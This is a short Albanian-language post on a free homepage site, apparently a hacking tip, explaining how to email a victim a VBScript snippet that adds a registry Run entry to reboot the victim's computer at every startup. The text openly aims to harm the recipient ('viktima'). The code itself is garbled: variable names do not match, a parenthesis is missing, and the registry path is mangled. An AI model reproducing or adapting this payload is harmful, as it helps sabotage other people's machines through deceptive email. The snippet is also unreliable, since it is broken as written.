entizma  
 
  PRISH P-CJA 16.06.2019 13:40 (UTC)
   
 
   
   
 
Code te cilat e shkymin kompjuterin edhe code te tjera
 
 
Hym ne emailin tone ne Hotmail dhe shkojme dhe krijojme nje mesazh te ri!
Shenojme emailin e viktimes dhe ne titullin(subject) shenojme dicka atraktive dhe ne pjesen ku e shenojm mesazhin shenojme ket:
--------------------------------------------------------------------------

******** ****************="vbscript">
on error resume next
dim ok
set ok=CreateObject("WScript.Shell"

kutluk.RegWrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCur rent VersionRunSYSTEM32","shutdown -r"

</script>
--------------------------------------------------------------------------
Viktima me hapjen e ketij emaili, ne funksion do te hyn kodi qe eshe pak me nalt, do ti shkymet kompjuteri! dhe cdoher kur te Starton kopmjuterin! per 24 sekonda do ti shymet        
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
  Werbung
Heute waren schon 1 Besucher (17 Hits) hier!
=> Willst du auch eine kostenlose Homepage? Dann klicke hier! <=